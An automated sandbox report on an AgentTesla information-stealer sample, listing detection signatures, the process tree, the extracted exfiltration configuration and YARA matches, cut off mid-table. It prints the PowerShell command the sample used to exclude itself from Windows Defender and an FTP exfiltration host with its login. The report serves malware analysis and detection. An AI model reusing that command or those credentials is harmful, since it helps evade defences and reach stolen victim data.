Edit tour

Windows Analysis Report
iNFGd6bDZX.exe

Overview

General Information

Sample name:	iNFGd6bDZX.exe renamed because original name is a hash value
Original sample name:	9802175dc78cef260413c05623704f267eaa8184d8d6bcb68e15e82de4ee696e.exe
Analysis ID:	1588699
MD5:	8fbffb8434e574ea1bb6865da7af4c8d
SHA1:	557bac80418049b3c97821a2b60bb3928211a644
SHA256:	9802175dc78cef260413c05623704f267eaa8184d8d6bcb68e15e82de4ee696e
Tags:	AgentTeslaexeuser-adrian__luca
Infos:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AgentTesla

Yara detected AntiVM3

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Hides that the sample has been downloaded from the Internet (zone.identifier)

Injects a PE file into a foreign processes

Installs a global keyboard hook

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Allocates memory with a write watch (potentially for evading sandboxes)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Powershell Defender Exclusion

Uses 32bit PE files

Uses FTP

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

iNFGd6bDZX.exe (PID: 7352 cmdline: "C:\Users\user\Desktop\iNFGd6bDZX.exe" MD5: 8FBFFB8434E574EA1BB6865DA7AF4C8D)

powershell.exe (PID: 7540 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\iNFGd6bDZX.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7780 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

iNFGd6bDZX.exe (PID: 7552 cmdline: "C:\Users\user\Desktop\iNFGd6bDZX.exe" MD5: 8FBFFB8434E574EA1BB6865DA7AF4C8D)

iNFGd6bDZX.exe (PID: 7568 cmdline: "C:\Users\user\Desktop\iNFGd6bDZX.exe" MD5: 8FBFFB8434E574EA1BB6865DA7AF4C8D)

newapp.exe (PID: 7984 cmdline: "C:\Users\user\AppData\Roaming\newapp\newapp.exe" MD5: 8FBFFB8434E574EA1BB6865DA7AF4C8D)

newapp.exe (PID: 8040 cmdline: "C:\Users\user\AppData\Roaming\newapp\newapp.exe" MD5: 8FBFFB8434E574EA1BB6865DA7AF4C8D)

newapp.exe (PID: 8048 cmdline: "C:\Users\user\AppData\Roaming\newapp\newapp.exe" MD5: 8FBFFB8434E574EA1BB6865DA7AF4C8D)

newapp.exe (PID: 8056 cmdline: "C:\Users\user\AppData\Roaming\newapp\newapp.exe" MD5: 8FBFFB8434E574EA1BB6865DA7AF4C8D)

newapp.exe (PID: 2032 cmdline: "C:\Users\user\AppData\Roaming\newapp\newapp.exe" MD5: 8FBFFB8434E574EA1BB6865DA7AF4C8D)

newapp.exe (PID: 7296 cmdline: "C:\Users\user\AppData\Roaming\newapp\newapp.exe" MD5: 8FBFFB8434E574EA1BB6865DA7AF4C8D)

newapp.exe (PID: 4192 cmdline: "C:\Users\user\AppData\Roaming\newapp\newapp.exe" MD5: 8FBFFB8434E574EA1BB6865DA7AF4C8D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://0xmrmagnezi.github.io/malware%20analysis/AgentTesla/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "FTP", "Host": "ftp://ftp.ercolina-usa.com", "Username": "ben@ercolina-usa.com", "Password": "nXe0M~WkW&nJ"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security

Memory Dumps

Source	Rule	Description	Author
0000000E.00000002.2925773285.0000000002B2C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000A.00000002.2927028894.0000000002B7C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000007.00000002.1840585657.0000000004E6E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.1840585657.0000000004E6E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000005.00000002.2927556251.000000000340C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000A.00000002.2927028894.0000000002B51000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.2927028894.0000000002B51000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000A.00000002.2918833865.0000000000436000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.2918833865.0000000000436000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000005.00000002.2927556251.00000000033E1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000002.2927556251.00000000033E1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000C.00000002.1939852793.000000000427F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000C.00000002.1939852793.000000000427F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000E.00000002.2925773285.0000000002B01000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000E.00000002.2925773285.0000000002B01000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000007.00000002.1840585657.0000000004EEF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.1840585657.0000000004EEF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.1726457785.0000000004221000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1726457785.0000000004221000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: iNFGd6bDZX.exe PID: 7352	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: iNFGd6bDZX.exe PID: 7352	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: iNFGd6bDZX.exe PID: 7352	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: iNFGd6bDZX.exe PID: 7568	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: iNFGd6bDZX.exe PID: 7568	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: newapp.exe PID: 7984	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: newapp.exe PID: 7984	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: newapp.exe PID: 7984	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: newapp.exe PID: 8056	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: newapp.exe PID: 8056	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: newapp.exe PID: 2032	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: newapp.exe PID: 2032	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: newapp.exe PID: 4192	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: newapp.exe PID: 4192	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Click to see the 28 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
10.2.newapp.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.newapp.exe.400000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
10.2.newapp.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x359dc:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x35a4e:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x35ad8:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x35b6a:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x35bd4:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x35c46:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x35cdc:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x35d6c:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
7.2.newapp.exe.4eefd48.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.newapp.exe.4eefd48.3.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
7.2.newapp.exe.4eefd48.3.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x33bdc:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x33c4e:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x33cd8:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x33d6a:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x33dd4:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x33e46:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x33edc:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x33f6c:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
7.2.newapp.exe.4eefd48.3.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x30dec:$s2: GetPrivateProfileString 0x30472:$s3: get_OSFullName 0x31b69:$s5: remove_Key 0x31d29:$s5: remove_Key 0x32ca1:$s6: FtpWebRequest 0x33bbe:$s7: logins 0x34130:$s7: logins 0x36e41:$s7: logins 0x36ef3:$s7: logins 0x389be:$s7: logins 0x37a8d:$s9: 1.85 (Hash, version 2, native byte-order)
12.2.newapp.exe.427fd00.8.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
12.2.newapp.exe.427fd00.8.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
12.2.newapp.exe.427fd00.8.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x33bdc:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x33c4e:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x33cd8:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x33d6a:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x33dd4:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x33e46:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x33edc:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x33f6c:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
12.2.newapp.exe.427fd00.8.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x30dec:$s2: GetPrivateProfileString 0x30472:$s3: get_OSFullName 0x31b69:$s5: remove_Key 0x31d29:$s5: remove_Key 0x32ca1:$s6: FtpWebRequest 0x33bbe:$s7: logins 0x34130:$s7: logins 0x36e41:$s7: logins 0x36ef3:$s7: logins 0x389be:$s7: logins 0x37a8d:$s9: 1.85 (Hash, version 2, native byte-order)
0.2.iNFGd6bDZX.exe.425ef28.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.iNFGd6bDZX.exe.425ef28.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.iNFGd6bDZX.exe.425ef28.0.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x33bdc:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x33c4e:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x33cd8:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x33d6a:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x33dd4:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x33e46:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x33edc:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x33f6c:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.iNFGd6bDZX.exe.425ef28.0.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x30dec:$s2: GetPrivateProfileString 0x30472:$s3: get_OSFullName 0x31b69:$s5: remove_Key 0x31d29:$s5: remove_Key 0x32ca1:$s6: FtpWebRequest 0x33bbe:$s7: logins 0x34130:$s7: logins 0x36e41:$s7: logins 0x36ef3:$s7: logins 0x389be:$s7: logins 0x37a8d:$s9: 1.85 (Hash, version 2, native byte-order)
7.2.newapp.exe.4e6ee90.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.newapp.exe.4e6ee90.4.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
7.2.newapp.exe.4e6ee90.4.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x33bdc:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x33c4e:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x33cd8:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x33d6a:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x33dd4:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x33e46:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x33edc:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x33f6c:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
7.2.newapp.exe.4e6ee90.4.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x30dec:$s2: GetPrivateProfileString 0x30472:$s3: get_OSFullName 0x31b69:$s5: remove_Key 0x31d29:$s5: remove_Key 0x32ca1:$s6: FtpWebRequest 0x33bbe:$s7: logins 0x34130:$s7: logins 0x36e41:$s7: logins 0x36ef3:$s7: logins 0x389be:$s7: logins 0x37a8d:$s9: 1.85 (Hash, version 2, native byte-order)
0.2.iNFGd6bDZX.exe.4221d08.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.iNFGd6bDZX.exe.4221d08.1.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.iNFGd6bDZX.exe.4221d08.1.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x33bdc:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x33c4e:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x33cd8:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x33d6a:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x33dd4:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x33e46:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x33edc:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x33f6c:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.iNFGd6bDZX.exe.4221d08.1.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x30dec:$s2: GetPrivateProfileString 0x30472:$s3: get_OSFullName 0x31b69:$s5: remove_Key 0x31d29:$s5: remove_Key 0x32ca1:$s6: FtpWebRequest 0x33bbe:$s7: logins 0x34130:$s7: logins 0x36e41:$s7: logins 0x36ef3:$s7: logins 0x389be:$s7: logins 0x37a8d:$s9: 1.85 (Hash, version 2, native byte-order)
7.2.newapp.exe.4e6ee90.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.newapp.exe.4e6ee90.4.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
7.2.newapp.exe.4e6ee90.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x359dc:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x35a4e:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x35ad8:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x35b6a:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x35bd4:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x35c46:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x35cdc:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x35d6c:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
7.2.newapp.exe.4e6ee90.4.raw.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x32bec:$s2: GetPrivateProfileString 0x32272:$s3: get_OSFullName 0x33969:$s5: remove_Key 0x33b29:$s5: remove_Key 0x34aa1:$s6: FtpWebRequest 0x359be:$s7: logins 0x35f30:$s7: logins 0x38c41:$s7: logins 0x38cf3:$s7: logins 0x3a7be:$s7: logins 0x3988d:$s9: 1.85 (Hash, version 2, native byte-order)
12.2.newapp.exe.427fd00.8.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
12.2.newapp.exe.427fd00.8.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
12.2.newapp.exe.427fd00.8.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x359dc:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x729fc:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x35a4e:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x72a6e:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x35ad8:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x72af8:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x35b6a:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x72b8a:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x35bd4:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x72bf4:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x35c46:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x72c66:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x35cdc:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x72cfc:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x35d6c:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548 0x72d8c:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
12.2.newapp.exe.427fd00.8.raw.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x32bec:$s2: GetPrivateProfileString 0x6fc0c:$s2: GetPrivateProfileString 0x32272:$s3: get_OSFullName 0x6f292:$s3: get_OSFullName 0x33969:$s5: remove_Key 0x33b29:$s5: remove_Key 0x70989:$s5: remove_Key 0x70b49:$s5: remove_Key 0x34aa1:$s6: FtpWebRequest 0x71ac1:$s6: FtpWebRequest 0x359be:$s7: logins 0x35f30:$s7: logins 0x38c41:$s7: logins 0x38cf3:$s7: logins 0x3a7be:$s7: logins 0x729de:$s7: logins 0x72f50:$s7: logins 0x75c61:$s7: logins 0x75d13:$s7: logins 0x777de:$s7: logins 0x3988d:$s9: 1.85 (Hash, version 2, native byte-order)
7.2.newapp.exe.4eefd48.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.newapp.exe.4eefd48.3.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
7.2.newapp.exe.4eefd48.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x359dc:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x729fc:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x35a4e:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x72a6e:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x35ad8:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x72af8:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x35b6a:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x72b8a:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x35bd4:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x72bf4:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x35c46:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x72c66:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x35cdc:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x72cfc:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x35d6c:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548 0x72d8c:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
7.2.newapp.exe.4eefd48.3.raw.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x32bec:$s2: GetPrivateProfileString 0x6fc0c:$s2: GetPrivateProfileString 0x32272:$s3: get_OSFullName 0x6f292:$s3: get_OSFullName 0x33969:$s5: remove_Key 0x33b29:$s5: remove_Key 0x70989:$s5: remove_Key 0x70b49:$s5: remove_Key 0x34aa1:$s6: FtpWebRequest 0x71ac1:$s6: FtpWebRequest 0x359be:$s7: logins 0x35f30:$s7: logins 0x38c41:$s7: logins 0x38cf3:$s7: logins 0x3a7be:$s7: logins 0x729de:$s7: logins 0x72f50:$s7: logins 0x75c61:$s7: logins 0x75d13:$s7: logins 0x777de:$s7: logins 0x3988d:$s9: 1.85 (Hash, version 2, native byte-order)
0.2.iNFGd6bDZX.exe.425ef28.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.iNFGd6bDZX.exe.425ef28.0.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.iNFGd6bDZX.exe.425ef28.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x359dc:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x729fc:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x35a4e:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x72a6e:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x35ad8:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x72af8:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x35b6a:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x72b8a:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x35bd4:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x72bf4:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x35c46:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x72c66:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x35cdc:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x72cfc:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x35d6c:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548 0x72d8c:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.iNFGd6bDZX.exe.425ef28.0.raw.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x32bec:$s2: GetPrivateProfileString 0x6fc0c:$s2: GetPrivateProfileString 0x32272:$s3: get_OSFullName 0x6f292:$s3: get_OSFullName 0x33969:$s5: remove_Key 0x33b29:$s5: remove_Key 0x70989:$s5: remove_Key 0x70b49:$s5: remove_Key 0x34aa1:$s6: FtpWebRequest 0x71ac1:$s6: FtpWebRequest 0x359be:$s7: logins 0x35f30:$s7: logins 0x38c41:$s7: logins 0x38cf3:$s7: logins 0x3a7be:$s7: logins 0x729de:$s7: logins 0x72f50:$s7: logins 0x75c61:$s7: logins 0x75d13:$s7: logins 0x777de:$s7: logins 0x3988d:$s9: 1.85 (Hash, version 2, native byte-order)
0.2.iNFGd6bDZX.exe.4221d08.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.iNFGd6bDZX.exe.4221d08.1.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.iNFGd6bDZX.exe.4221d08.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x359dc:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x72bfc:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0xafc1c:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x35a4e:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x72c6e:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0xafc8e:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x35ad8:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x72cf8:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0xafd18:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x35b6a:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x72d8a:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0xafdaa:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x35bd4:$s5: 